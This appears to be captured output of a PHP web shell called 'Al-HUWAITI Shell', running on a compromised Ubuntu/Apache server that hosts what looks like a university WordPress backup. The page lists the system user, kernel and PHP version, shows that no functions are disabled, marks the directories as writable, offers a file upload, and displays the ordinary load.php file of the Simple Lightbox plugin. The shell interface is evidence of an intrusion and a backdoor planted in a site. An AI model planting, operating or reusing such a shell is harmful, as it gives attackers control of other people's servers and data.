hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/home.obu.edu.bak/wp-content/plugins/simple-lightbox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/home.obu.edu.bak/wp-content/plugins/simple-lightbox/load.php
<?php

/* Constants */

if ( !defined('SLB_DEV') ) {
	define('SLB_DEV', ( isset( $_REQUEST['slb_dev'] ) && !!$_REQUEST['slb_dev'] ) );
}

/* Class Management */

/**
 * Class loading handler
 * @param string $classname Class to load
 */
function slb_autoload($classname) {
	$prefix = 'slb_';
	$cls = strtolower($classname);
	// Remove prefix
	if ( 0 !== strpos($cls, $prefix) ) {
		return false;
	}
	// Format class for filename
	$fn = 'class.' . substr($cls, strlen($prefix)) . '.php';
	// Build path
	$path = dirname(__FILE__) . '/' . "includes/" . $fn;
	// Load file
	if ( is_readable($path) ) {
		require $path;
	}
}
spl_autoload_register('slb_autoload');

/* Load Assets */

$path = dirname(__FILE__) . '/';
require_once $path . 'controller.php';
$GLOBALS['slb'] = new SLB_Lightbox();
require_once $path . 'functions.php';

Al-HUWAITI Shell